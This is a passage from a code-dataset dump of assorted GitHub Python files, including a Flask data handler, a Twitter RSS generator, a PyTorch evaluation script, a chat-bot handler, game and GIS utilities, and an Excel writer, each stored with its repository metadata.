json\n\n\nto_csv = {str: lambda x: x, dict: lambda x: json.dumps(x)}\nfrom_csv = {str: lambda x: x, dict: lambda x: json.loads(x)}\n\n\nclass DataHandler(abc.ABC):\n @property\n @abc.abstractmethod\n def dict_elems(self):\n raise NotImplementedError\n\n @property\n @abc.abstractmethod\n def info_data_type_to_slug(self):\n raise NotImplementedError\n\n @property\n @abc.abstractmethod\n def possible_timespans(self):\n raise NotImplementedError\n\n @classmethod\n @abc.abstractmethod\n def from_data(cls, *args, **kwargs):\n raise NotImplementedError\n\n @classmethod\n def from_dict(cls, d: dict) -> \"DataHandler\":\n obj = cls()\n for elem in cls.dict_elems.keys():\n setattr(obj, elem, d[elem])\n return obj\n\n def to_dict(self) -> dict:\n def inner():\n for elem in self.dict_elems.keys():\n yield elem, getattr(self, elem)\n\n return dict(inner())\n\n @classmethod\n def from_csv(cls, l: list) -> \"DataHandler\":\n obj = cls()\n for k, v in cls.dict_elems.items():\n setattr(obj, k, from_csv[v](l.pop(0)))\n return obj\n\n def to_csv(self) -> list:\n def inner():\n for k, v in self.dict_elems.items():\n yield to_csv[v](getattr(self, k))\n\n return list(inner())\n\n def __repr__(self) -> str:\n def inner():\n for k in self.dict_elems.keys():\n yield f\"{k}={getattr(self, k)}\"\n\n return \"<{} {}>\".format(self.__class__.__name__, \" \".join(inner()))\n\n\nclass FrankfurtData(DataHandler):\n dict_elems = {\"isin\": str, \"slug\": str, \"name\": str, \"performance\": dict}\n info_data_type_to_slug = {\"ETP\": \"etf\", \"EQUITY\": \"aktie\"}\n possible_timespans = [\"months1\", \"months3\", \"months6\", \"years1\", \"years2\", \"years3\"]\n\n @classmethod\n def from_data(cls, isin, info_data, performance_data) -> \"FrankfurtData\":\n obj = cls()\n obj.isin: str = isin\n obj.slug: str = (\n cls.info_data_type_to_slug[info_data[\"type\"]] + \"/\" + info_data[\"slug\"]\n )\n obj.name: str = info_data[\"name\"][\"originalValue\"]\n obj.performance: dict = performance_data\n return obj\n\n\nfrom flask import Response\ndef jsonify(d):\n return Response(\n json.dumps(d, cls=FrankfurtDataEncoder), mimetype=\"application/json\"\n )\n\n\n@dataclass\nclass Provider:\n name: str\n css_input_selector: str\n url: str\n search_param: str\n data_search_param: str\n data_handler: DataHandler\n\n\nclass Providers:\n frankfurt = Provider(\n \"frankfurt\",\n \"input.mat-input-element\",\n \"https://www.boerse-frankfurt.de/\",\n f\"de\\?searchTerms=\",\n \"performance\",\n FrankfurtData,\n )\n # wallstreet = Provider(\"wallstreet\", \"#search\", \"https://www.wallstreet-online.de/\", \"searchInst\")\n\n\nclass FrankfurtDataEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, FrankfurtData):\n return o.to_dict()\n return json.JSONEncoder.default(self, o)\n\n\nclass FrankfurtDataDecoder(json.JSONDecoder):\n def __init__(self, *args, **kwargs):\n super().__init__(object_hook=self.object_hook, *args, **kwargs)\n\n def object_hook(self, d: dict):\n if list(FrankfurtData.dict_elems.keys()) == list(d.keys()):\n return FrankfurtData.from_dict(d)\n return d\n","repo_name":"manjaroman2/banana-banana","sub_path":"server/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17494302329","text":"# -*- coding: utf-8 -*-\nimport datetime\n\nfrom twitter import *\nimport PyRSS2Gen\n\n\n\nclass Config:\n def __init__(self, config_path):\n self.config = open(config_path,'r')\n\n def conf_value(line):\n return line.split('=')[1].strip()\n\n for line in self.config:\n value = conf_value(line)\n if line.startswith('consumer_key'):\n self.consumer_key = value\n elif line.startswith('consumer_secret'):\n self.consumer_secret = value\n elif line.startswith('access_token_key'):\n self.access_token_key = value\n elif line.startswith('access_token_secret'):\n self.access_token_secret = value\n elif line.startswith('user_id'):\n self.user_id = value\n\n\nclass MyFeed:\n def __init__(self, config_path=\"config\", xml_out_file=\"pyrss2gen.xml\"):\n self.config = Config(config_path)\n self.statuses_file = \"\"\n self.title = \"Vanderloos PyRSS2Gen feed\"\n self.link = \"http://twitter.com/van_der_loos\"\n self.description = \"The latest tweets from vanderloos' friends\"\n self.xml_out_file = xml_out_file\n\n def get_feed(self,num=50):\n api = Twitter(auth=OAuth(self.config.access_token_key,\n self.config.access_token_secret, self.config.consumer_key, self.config.consumer_secret))\n\n rss = PyRSS2Gen.RSS2(self.title, self.link, self.description,\n lastBuildDate=datetime.datetime.now(), items=[])\n if self.statuses_file:\n twitter_statuses = open(self.statuses_file, 'w')\n twitter_statuses.write('')\n twitter_statuses.close()\n twitter_statuses = open(self.statuses_file, 'a')\n statuses_sum = api.statuses.home_timeline(count=num)\n\n statuses_sum.sort(key=lambda tweet: tweet['created_at'], reverse=False)\n\n for tweet in statuses_sum:\n tweet_text = tweet['text'].replace('і','i').replace('є','je').replace('ї','ji').replace('Є','je').replace('Ї','ji').replace('І','I')\n item = PyRSS2Gen.RSSItem(title='@' + tweet['user']['screen_name'] + ': ' + tweet_text)\n tweet_url = r'https://twitter.com/' + tweet['user']['screen_name'] + r'/status/' + tweet['id_str']\n if tweet['in_reply_to_status_id']:\n tweet_replied = api.statuses.show(id = tweet['in_reply_to_status_id'])\n text_replied = tweet_replied['text']\n item.description = str(r'In reply to: ' + tweet['in_reply_to_screen_name'] + ': ' + text_replied) + '
    The original text: ' + tweet_text\n else: item.description = r'tweet link
    ' + tweet_text\n if tweet['entities']['urls']:\n item.link = tweet['entities']['urls'][0]['expanded_url']\n\n item.guid = PyRSS2Gen.Guid(tweet_url)\n item.pubDate = tweet['created_at']\n item.author = tweet['user']['name']\n\n rss.items.append(item)\n '''if self.statuses_file:\n twitter_statuses.write(tweet['user']['name']) + '\\n'\n twitter_statuses.write(tweet['text']) + '\\n'\n\t\t\t'''\n rss.write_xml(open(self.xml_out_file, \"w\"), encoding = 'utf-8')\n if self.statuses_file:\n twitter_statuses.close()\n\n\ndef feed(config, out):\n a = MyFeed(config_path=config, xml_out_file=out)\n a.get_feed()\n return 'Success'\n","repo_name":"vanderloos/tweetfeed","sub_path":"tweetfeed.py","file_name":"tweetfeed.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39863360480","text":"import numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\nimport seaborn as sns\nimport random\nimport cv2\nimport copy\nimport os\nimport os.path as osp\nfrom sklearn.model_selection import train_test_split\nimport time\nimport sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport torchvision.models as models\nfrom torch import optim\nfrom torchvision.datasets import ImageFolder\nfrom torchvision.utils import make_grid\nimport torchvision.transforms as T\nfrom torch.utils.data import Dataset, DataLoader, ConcatDataset\nfrom PIL import Image\n\nfrom sklearn.metrics import confusion_matrix\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\ndef init_seeds(seed=0, cuda_deterministic=True):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n # Speed-reproducibility tradeoff https://pytorch.org/docs/stable/notes/randomness.html\n if cuda_deterministic: # slower, more reproducible\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n else: # faster, less reproducible\n torch.backends.cudnn.deterministic = False\n torch.backends.cudnn.benchmark = True\n \n \n# Declare data augmentation transforms\ndef transform_data(mode):\n if mode=='train':\n img_transforms = T.Compose([\n T.Resize(256),\n T.CenterCrop(224),\n T.RandomHorizontalFlip(),\n T.RandomRotation(10),\n T.RandomGrayscale(),\n T.ToTensor(),\n T.Normalize([0.489, 0.456, 0.406], [0.229, 0.224, 0.225])\n \n ])\n elif mode=='val':\n img_transforms = T.Compose([\n T.Resize(256),\n T.CenterCrop(224),\n T.ToTensor(),\n T.Normalize([0.489, 0.456, 0.406], [0.229, 0.224, 0.225])\n \n ])\n else:\n img_transforms = T.Compose([\n T.Resize(256),\n T.CenterCrop(224),\n T.ToTensor(),\n T.Normalize([0.489, 0.456, 0.406], [0.229, 0.224, 0.225])\n \n ])\n \n return img_transforms\n\n\ndef accuracy(preds, labels):\n preds = torch.exp(preds)\n top_p,top_class = preds.topk(1, dim=1)\n equals = top_class == labels.view(*top_class.shape)\n return torch.mean(equals.type(torch.FloatTensor))\n\ndef test(model, test_loader, criterion):\n model.eval()\n steps = len(test_loader)\n \n val_loss = 0.0\n val_acc = 0.0\n \n with torch.no_grad():\n for batch_id, (imgs, trgt) in tqdm(enumerate(test_loader)):\n imgs = imgs.to(device)\n trgt = trgt.to(device)\n \n preds = model(imgs)\n loss = criterion(preds, trgt)\n \n val_loss += loss.item()\n \n val_acc += accuracy(preds, trgt)\n \n print(f'[TEST]: Loss: {val_loss/len(test_loader)}, Acc: {val_acc/len(test_loader)}')\n return val_loss/len(test_loader)\n\nif __name__ == '__main__':\n \n # Set random seed for reproducibility\n init_seeds(4673)\n \n data_root_path = \"/home/akash/spring23_coursework/cap5516/a1/chest_xray\"\n \n # Load datasets\n test_dataset = ImageFolder(osp.join(data_root_path, 'test'), transform=transform_data(mode='test'))\n \n # HYPERPARAMS\n BATCH_SIZE = 48\n \n # Dataloader\n test_loader = DataLoader(test_dataset, batch_size=BATCH_SIZE, shuffle=False, num_workers=8, pin_memory=True)\n \n # Define model\n model = torchvision.models.resnet50(pretrained=False).to(device)\n \n # # modify fc layer\n model.fc = nn.Linear(2048, 2).to(device) # number of classes -2 \n model.load_state_dict(torch.load('train_log_wts/scratch/03-21-00-05/best_model_val_loss_7.pth'), strict=True)\n # define criterion\n criterion = nn.CrossEntropyLoss()\n \n test_loss = test(model, test_loader, criterion)\n \n \n \n \n \n ","repo_name":"AKASH2907/cap5516_project_assignments","sub_path":"a1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72658181812","text":"#!/usr/bin/python3\n\"\"\" Script that uses JSONPlaceholder API to get information about employee \"\"\"\nimport requests\nimport sys\n\n\nif __name__ == \"__main__\":\n url = 'https://jsonplaceholder.typicode.com/'\n\n user = '{}users/{}'.format(url, sys.argv[1])\n response1 = requests.get(user)\n json_file = response1.json()\n print(\"Employee {} is done with tasks\".format(\n json_file.get('name')), end=\"\")\n\n todos = '{}todos?userId={}'.format(url, sys.argv[1])\n response2 = requests.get(todos)\n tasks = response2.json()\n completed_task = []\n for task in tasks:\n if task.get('completed') is True:\n completed_task.append(task)\n\n print(\"({}/{}):\".format(len(completed_task), len(tasks)))\n for task in completed_task:\n print(\"\\t {}\".format(task.get(\"title\")))\n","repo_name":"5237-mests/alx-system_engineering-devops","sub_path":"0x15-api/0-gather_data_from_an_API.py","file_name":"0-gather_data_from_an_API.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33249818113","text":"from graia.saya import Channel\nfrom graia.ariadne.app import Ariadne\nfrom graia.ariadne.model import Group, Member\nfrom graia.ariadne.message.chain import MessageChain\nfrom graia.ariadne.message.element import Voice\nfrom graia.ariadne.event.message import GroupMessage\nfrom graia.broadcast.exceptions import ExecutionStop\nfrom graia.saya.builtins.broadcast.schema import ListenerSchema\nfrom graia.ariadne.message.parser.twilight import (\n Twilight,\n RegexResult,\n WildcardMatch,\n)\n\nfrom libs.control import Permission\nfrom libs.dict_loader import DictData\n\n\nchannel = Channel.current()\n\n@channel.use(\n ListenerSchema(\n listening_events=[GroupMessage],\n inline_dispatchers=[Twilight([\"anything\" @ WildcardMatch()])]\n )\n)\nasync def main(app: Ariadne, member: Member, group: Group, anything: RegexResult):\n \n try:\n Permission.group_permission_check(group, \"sample_player\")\n except Exception as e:\n raise ExecutionStop()\n \n try: \n Permission.user_permission_check(member, Permission.DEFAULT)\n except Exception as e :\n raise ExecutionStop()\n \n if anything.matched:\n msg = anything.result.display\n if msg in DictData.GenshinSample.dictionary.keys():\n my_path = \"data/play/samples/\" + DictData.GenshinSample.dictionary[msg] + \".silk\"\n await app.send_group_message(\n group,\n MessageChain([Voice(path = my_path)])\n )\n ","repo_name":"mikezom/bigbedbot-py","sub_path":"libs/function/event/sample_player.py","file_name":"sample_player.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"3166615","text":"from playwright.sync_api import sync_playwright\n\ndef automate(meetup_group_url):\n # open the website\n with sync_playwright() as p:\n browser = p.chromium.launch(headless=False)\n page = browser.new_page()\n page.goto(\"https://www.google.com\")\n\n # search for \"playwright\"\n page.fill(\"input[aria-label='Search']\", \"playwright\")\n page.click(\"text=Google Search\")\n\n # click on the first result\n page.click(\"text=Playwright: Python library to automate Chromium, Firefox and WebKit\")\n\n # close the browser\n browser.close()","repo_name":"wasdee/ThaiPy2TechCal","sub_path":"thaipy2techcal/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4296624501","text":"#Add Attribute\nclass Student:\n def __init__(self, name , age, id, grades):\n self.name = name\n self.age = age\n self.id = id\n self.grades = grades\n\n def talk(self):\n print(\"My name is :\", self.name)\n\n\nstudent1 = Student('Nouf', 21, 'xx00', [95,85,92])\nstudent2 = Student('Hessan', 19, 'xx01', 95)\n#Add attribute to object\nstudent2.v_hours = 16\n\nprint(dir(student1))\nprint(dir(student2)) # we see the v_hours is added to student2 object \n","repo_name":"kholoodi/Python","sub_path":"Python courses/Python103/Attributes&Methods 2/AddAttributes2-3.py","file_name":"AddAttributes2-3.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17708364541","text":"import triangle\nimport triangle.plot\nimport matplotlib.pyplot as plt\n\npts = triangle.get_data('dots')['vertices']\n\nax1 = plt.subplot(121, aspect='equal')\ntriangle.plot.plot(ax1, vertices=pts)\nlim = ax1.axis()\n\npoints, edges, ray_origin, ray_direct = triangle.voronoi(pts)\nd = dict(vertices=points, edges=edges, ray_origins=ray_origin, ray_directions=ray_direct)\nax2 = plt.subplot(122, sharex=ax1, sharey=ax1)\ntriangle.plot.plot(ax2, **d)\nax2.axis(lim)\n\nplt.show()\n","repo_name":"Geodels/tribad","sub_path":"doc/plot/voronoi.py","file_name":"voronoi.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73796559414","text":"# 装备属性部分\n# import json\n# import os\n\nfrom PublicReference.utils.constant import *\nfrom .装备_套装 import *\nfrom .装备_特殊 import *\nfrom .装备_首饰 import *\nfrom .装备_防具 import *\nfrom .装备_武器 import *\nfrom .基础函数 import *\nfrom .融合_希洛克 import 希洛克\nfrom .融合_奥兹玛 import 奥兹玛\n\n装备版本 = \"GF\"\n\n# with open(\"ResourceFiles/Config/release_version.json\") as fp:\n# versionInfo = json.load(fp)\n# 装备版本 = versionInfo['EquipmentVersion']\n# fp.close()\n\n# if 装备版本.upper() == \"GF\":\n\n# else:\n# from .装备_武器_HF import *\n# from .装备_防具_HF import *\n# from .装备_首饰_HF import *\n# from .装备_特殊_HF import *\n# from .装备_套装_HF import *\n\n\nclass equipment():\n def __init__(self):\n self.load_equ()\n self.load_suit()\n\n def load_equ(self):\n self.equ_list = {}\n self.equ_id = {}\n self.equ_tuple = ()\n self.equ_id_tuple = ()\n self.index = {}\n for i in range(535): #534件装备\n temp = eval('装备{}()'.format(i))\n self.equ_list[i] = temp\n self.equ_id[temp.名称] = i\n self.equ_tuple += (temp, )\n self.equ_id_tuple += (i, )\n key = '{}\\t{}\\t{}'.format(temp.所属套装, temp.品质, temp.部位)\n self.index[key] = i\n\n def load_suit(self):\n self.suit_list = {}\n self.suit_id = {}\n self.suit_name = ()\n self.suit_tuple = ()\n for i in range(127): #126个套装效果\n temp = eval('套装效果{}()'.format(i))\n self.suit_list[i] = temp\n self.suit_tuple += (temp, )\n key = '{}[{}]'.format(temp.名称, temp.件数)\n self.suit_id[key] = i\n self.suit_name += (key, )\n\n def load_img(self):\n self.equ_img = {}\n #基础装备图标 0~999\n for i in self.get_equ_id_list():\n path = './ResourceFiles/img/装备/{}.gif'.format(i)\n img = QMovie(path)\n img.start()\n self.equ_img[i] = img\n #奥兹玛图标 1000~1024\n for i in range(25):\n path = './ResourceFiles/img/奥兹玛/{}.gif'.format(i)\n img = QMovie(path)\n img.start()\n self.equ_img[1000 + i] = img\n #希洛克图标 1100~1114\n for i in range(15):\n path = './ResourceFiles/img/希洛克/{}.gif'.format(i)\n img = QMovie(path)\n img.start()\n self.equ_img[1100 + i] = img\n #希洛克武器图标 2000~2999\n path = './ResourceFiles/img/希洛克/武器/'\n for i in os.listdir(path):\n img = QMovie(os.path.join(path, i))\n img.start()\n self.equ_img[2000 + int(i.split('.')[0])] = img\n\n def get_suits_by_equips(self, equips):\n suits = []\n dictionary = {}\n for i in equips:\n item = self.get_equ_by_name(i)\n if item.所属套装2 != '无':\n j = item.所属套装2\n k = item.所属套装\n if k != '智慧产物':\n dictionary[k] = dictionary.get(k, 0) + 1\n else:\n j = item.所属套装\n if j != '无':\n dictionary[j] = dictionary.get(j, 0) + 1\n\n for i in dictionary.keys():\n if dictionary[i] >= 2:\n temp = '{}[{}]'.format(i, 2)\n if temp in self.suit_name:\n suits.append(temp)\n if dictionary[i] >= 3:\n temp = '{}[{}]'.format(i, 3)\n if temp in self.suit_name:\n suits.append(temp)\n if dictionary[i] >= 5:\n temp = '{}[{}]'.format(i, 5)\n if temp in self.suit_name:\n suits.append(temp)\n for i in suits:\n try:\n temp = i.replace(i.split('[')[0], self.get_suit_by_name(i).子套装)\n if temp in suits:\n suits.remove(temp)\n except:\n pass\n return suits\n\n def get_suit_by_id(self, id):\n return self.suit_list.get(id, 套装())\n\n def get_suit_by_name(self, name):\n return self.get_suit_by_id(self.suit_id.get(name, 0))\n\n def get_equ_by_id(self, id):\n return self.equ_list.get(id, 装备())\n\n def get_img_by_id(self, id):\n return self.equ_img.get(id, QMovie(''))\n\n def get_equ_by_name(self, name):\n return self.get_equ_by_id(self.equ_id.get(name, 0))\n\n def get_img_by_name(self, name, num=0):\n id = self.equ_id.get(name, 0)\n # if id+num in self.equ_id_tuple:\n id += num\n return self.get_img_by_id(id)\n\n def get_id_by_name(self, name):\n return self.equ_id.get(name, 0)\n\n def get_equ_list(self):\n return self.equ_tuple\n\n def get_suit_list(self):\n return self.suit_tuple\n\n def get_equ_id_list(self):\n return self.equ_id_tuple\n\n def get_suit_name(self):\n return self.suit_name\n\n def get_id_by_index(self, suit, quality, part):\n key = '{}\\t{}\\t{}'.format(suit, quality, part)\n return self.index.get(key, 0)\n\n def get_equ_by_index(self, suit, quality, part):\n id = self.get_id_by_index(suit, quality, part)\n return self.get_equ_by_id(id)\n\n\nequ = equipment()\n","repo_name":"dnfcalc/DNFCalculating","sub_path":"PublicReference/equipment/equ_list.py","file_name":"equ_list.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"21"} +{"seq_id":"30617330139","text":"__author__ = 'Luiz Motta'\n__date__ = '2019-01-31'\n__copyright__ = '(C) 2019, Luiz Motta'\n__revision__ = '$Format:%H$'\n\nfrom qgis import utils as QgsUtils\nfrom qgis.core import QgsProject, QgsCoordinateTransform\n\nclass MapCanvasFeature():\n def __init__(self):\n self.project = QgsProject().instance()\n self.canvas = QgsUtils.iface.mapCanvas()\n \n def flash(self, layer, feature):\n self.canvas.flashGeometries( [ feature.geometry() ], layer.crs() )\n\n def zoom(self, layer, feature):\n def getBoudingBoxGeomCanvas():\n geom = feature.geometry()\n crsLayer = layer.crs()\n crsCanvas = self.project.crs()\n if not crsLayer == crsCanvas:\n ct = QgsCoordinateTransform( layer.crs(), self.project.crs(), self.project )\n bbox = ct.transform( geom.boundingBox() )\n else:\n bbox = geom.boundingBox()\n return bbox\n\n if not feature.hasGeometry():\n return\n self.canvas.setExtent( getBoudingBoxGeomCanvas() )\n self.canvas.zoomByFactor( 1.05 )\n self.canvas.refresh()\n self.flash( layer, feature )\n","repo_name":"lmotta/ibamaprocessing","sub_path":"algorithms/mapcanvasfeature.py","file_name":"mapcanvasfeature.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"32500270963","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 24 10:43:40 2021\n\n@author: Eric.Gomez-V@unilever.com\n\"\"\"\nfrom pandas import ExcelWriter\nfrom progress.bar import ShadyBar\n\n\ndef dict_to_excel(dict_sheetNames_dfs:dict, fileName:str):\n \"\"\"\n escribe dataFrames en un archvivo de excel\n \"\"\"\n print('Writing file: ',fileName)\n sheetNameList = list(dict_sheetNames_dfs.keys())\n dataFrameList = list(dict_sheetNames_dfs.values())\n def column_string(n:int):\n \"\"\"\n regresa el index de columna de excel con base en el numero n de columnas\n \"\"\"\n string = \"\"\n while n > 0:\n n, remainder = divmod(n - 1, 26)\n string = chr(65 + remainder) + string\n return string\n\n writer = ExcelWriter(# pylint: disable=abstract-class-instantiated\n path=fileName, engine='xlsxwriter') \n workbook = writer.book # pylint: disable=no-member\n header_format = workbook.add_format({'bold': True, 'align': 'center',\n 'fg_color': '#80bfff', 'border': 2,\n 'font_name': 'Times New Roman', 'font_size': 9})\n body_format = workbook.add_format(\n {'border': 1, 'align': 'left', 'font_name': 'Times New Roman', 'font_size': 9})\n bar = ShadyBar(\"Loading...\", max=len(dataFrameList), suffix='%(percent)d%%')\n indexSheet = 0\n for dataFrame in dataFrameList:\n letraInicial = \"A\"\n letraFinal = column_string(len(dataFrame.columns))\n letrasColXlsx = [column_string(i)\n for i in range(1, len(dataFrame.columns)+1)]\n lenColNames = [len(col) for col in dataFrame.columns]\n lenFirstColReg = [len(max(list(map(lambda x: str(x),dataFrame[col].tolist()))))\n for col in dataFrame.columns]\n dataFrame.to_excel(\n writer, sheet_name=sheetNameList[indexSheet], index=False)\n worksheet = writer.sheets[sheetNameList[indexSheet]]\n if len(letrasColXlsx) == len(lenColNames):\n for i in range(len(letrasColXlsx)):\n if lenColNames[i] > lenFirstColReg[i]:\n worksheet.set_column(\n letrasColXlsx[i]+':'+letrasColXlsx[i], lenColNames[i], body_format)\n else:\n worksheet.set_column(\n letrasColXlsx[i]+':'+letrasColXlsx[i], lenFirstColReg[i], body_format)\n for col_num, value in enumerate(dataFrame.columns.values):\n worksheet.write(0, col_num, value, header_format)\n worksheet.autofilter(letraInicial+'1:'+letraFinal+'1')\n if \"complete\" in sheetNameList[indexSheet]:\n worksheet.hide()\n indexSheet += 1\n bar.next()\n print(\"\\n\")\n writer.save()\n","repo_name":"refleon-cbot/ChatBot_LOG_summary","sub_path":"modules/file_writer_util.py","file_name":"file_writer_util.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71002093494","text":"# -*- coding: utf-8 -*-\r\n\"\"\"@package business.resource.integral_resource\r\n积分资源\r\n\r\n积分资源的属性:\r\n\r\n属性\t| 类型\t| 说明\r\n:------ | :------- | :-------\r\nintegral | 数值\t| 积分数量\r\nmoney | 数值 \t| 表示积分对应的价格\r\nintegral_log_id\t| 数值\t| 积分记录ID(待确认)\r\n\"\"\"\r\n\r\nimport logging\r\nimport decimal\r\nimport math\r\n#import json\r\n#from bs4 import BeautifulSoup\r\n#import math\r\n#import itertools\r\n#from datetime import datetime\r\n\r\nfrom eaglet.decorator import param_required\r\n##from wapi import wapi_utils\r\n#from eaglet.core.cache import utils as cache_util\r\nfrom db.mall import models as mall_models\r\n#import resource\r\nfrom eaglet.core import watchdog\r\nfrom business import model as business_model\r\n#from business.mall.product import Product\r\n#import settings\r\nfrom business.decorator import cached_context_property\r\n#from business.account.integral import Integral\r\n\r\nclass IntegralResource(business_model.Resource):\r\n\t\"\"\"积分资源\r\n\t\"\"\"\r\n\t__slots__ = (\r\n\t\t'type',\r\n\t\t'integral',\r\n\t\t'money',\r\n\t\t'integral_log_id'\r\n\t\t)\r\n\r\n\r\n\t@staticmethod\r\n\t@param_required(['webapp_owner', 'webapp_user', 'type'])\r\n\tdef get(args):\r\n\t\t\"\"\"工厂方法,创建IntegralResource对象\r\n\r\n\t\t@return IntegralResource对象\r\n\t\t\"\"\"\r\n\t\tintegral_resource = IntegralResource(args['webapp_owner'], args['webapp_user'], args['type'])\r\n\r\n\t\treturn integral_resource\r\n\r\n\tdef __init__(self, webapp_owner, webapp_user, type):\r\n\t\tbusiness_model.Resource.__init__(self)\r\n\t\tself.type = type\r\n\t\tself.context['webapp_user'] = webapp_user\r\n\t\tself.context['webapp_owner'] = webapp_owner\r\n\t\tself.context['money'] = None\r\n\r\n\tdef get_type(self):\r\n\t\treturn self.type\r\n\r\n\tdef get_resource(self, integral):\r\n\t\tself.integral = integral\r\n\t\t#self.money = integral_money\r\n\t\twebapp_user = self.context['webapp_user']\r\n\t\tself.integral_log_id = -1\r\n\t\tif integral > 0 and not webapp_user.can_use_integral(integral):\r\n\t\t\treturn False, u'积分不足'\r\n\t\telif integral == 0:\r\n\t\t\treturn True, u'00'\r\n\t\telse:\r\n\t\t\tsuccessed, integral_log_id = webapp_user.use_integral(integral)\r\n\t\t\tself.integral_log_id = integral_log_id\r\n\t\t\tif successed:\r\n\t\t\t\treturn True, ''\r\n\t\t\telse:\r\n\t\t\t\treturn False, u'扣除积分失败'\r\n\r\n\t@property\r\n\tdef money(self):\r\n\t\tif self.context['money']:\r\n\t\t\treturn self.context['money']\r\n\t\telse:\r\n\t\t\twebapp_owner = self.context['webapp_owner']\r\n\t\t\tcount_per_yuan = webapp_owner.integral_strategy_settings.integral_each_yuan\r\n\r\n\t\t\tif count_per_yuan == 0:\r\n\t\t\t\tlogging.error(\"ERROR: count_per_yuan SHOULD NOT be ZERO!\")\r\n\t\t\t\tintegral_money = float(self.integral)\r\n\t\t\telse:\r\n\t\t\t\tintegral_money = float(float(self.integral)/count_per_yuan)\r\n\r\n\t\t\tintegral_money = round(math.floor(integral_money*100)/100, 2) \r\n\t\t\t#integral_money = decimal.Decimal(integral_money).quantize(decimal.Decimal('.01'), rounding=decimal.ROUND_05UP)\r\n\t\t\treturn integral_money\r\n\r\n\t@money.setter\r\n\tdef money(self, money):\r\n\t\tself.context['money'] = money\r\n","repo_name":"chengdg/apiserver","sub_path":"business/resource/integral_resource.py","file_name":"integral_resource.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43062706772","text":"'''\r\n/* Copyright (C) Saltworks Security, LLC - All Rights Reserved\r\n* Unauthorized copying of this file, via any medium is strictly prohibited\r\n* Proprietary and confidential\r\n* Written by Saltworks Security, LLC (www.saltworks.io) , 2019\r\n*/\r\n'''\r\nimport json\r\nimport sys\r\nimport requests\r\n\r\n\r\nclass fodIssCounts:\r\n\tdef __init__(self):\r\n\t\tself.fodIsss = {}\r\n\r\n\tdef addIss(self,InFODIss):\r\n\r\n\t\t'''\r\n\t\tprint('{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}'.format(iCount, sscVul['_source']['projectVersionId'],\r\n vul['_source']['issueName'],\r\n vul['_source']['hidden'], \r\n vul['_source']['suppressed'], \r\n vul['_source']['removedDate'], \r\n vul['_source']['scanStatus']))\r\n\t\t'''\r\n\t\ttry:\r\n\t\t\tif InFODIss['_source']['isSuppressed']:\r\n\t\t\t\tholdstatus = 'Suppressed'\r\n\t\t\r\n\t\texcept KeyError:\r\n\r\n\t\t\tprint(InFODIss)\r\n\r\n\t\tif ((InFODIss['_source']['severityString'] == 'Critical') or (InFODIss['_source']['severityString'] == 'High') or (InFODIss['_source']['severityString'] == 'Medium') or (InFODIss['_source']['severityString'] == 'Low')):\r\n\t\t\tincludeRec = True\r\n\t\telse:\r\n\t\t\tincludeRec = False\r\n\r\n\t\tmatchfound = False\r\n\t\t\t\r\n\t\tif (InFODIss['_source']['isSuppressed'] and includeRec == True):\r\n\t\t\tholdstatus = 'Suppressed'\r\n\t\t\tmatchfound = True\r\n\t\t\tissKey = '{}{}{}{}{}{}'.format(InFODIss['_source']['releaseId'], InFODIss['_source']['category'], holdstatus, InFODIss['_source']['severityString'], InFODIss['_source']['introducedDate'], InFODIss['_source']['scantype']) \r\n\r\n\t\t\tif issKey in self.fodIsss:\r\n\t\t\t\t#Increment existing counts\r\n\t\t\t\tiss = self.fodIsss[issKey]\r\n\t\t\t\t#print('update')\r\n\t\t\telse:\r\n\t\t\t\t#vul = sscVulCount(InSSCVul['_source']['projectVersionId'])\r\n\t\t\t\t\r\n\t\t\t\tiss = {\r\n\t\t\t\t\t'releaseId': InFODIss['_source']['releaseId'],\r\n\t\t\t\t\t'category': InFODIss['_source']['category'],\r\n\t\t\t\t\t'status': holdstatus,\r\n\t\t\t\t\t'severityString': InFODIss['_source']['severityString'],\r\n\t\t\t\t\t'introducedDate': InFODIss['_source']['introducedDate'],\r\n\t\t\t\t\t'removedDate': '',\r\n\t\t\t\t\t'scantype': InFODIss['_source']['scantype'],\r\n\t\t\t\t\t'reccount': 0\r\n\t\t\t\t}\r\n\r\n\t\t\tiss['reccount'] = iss['reccount'] + 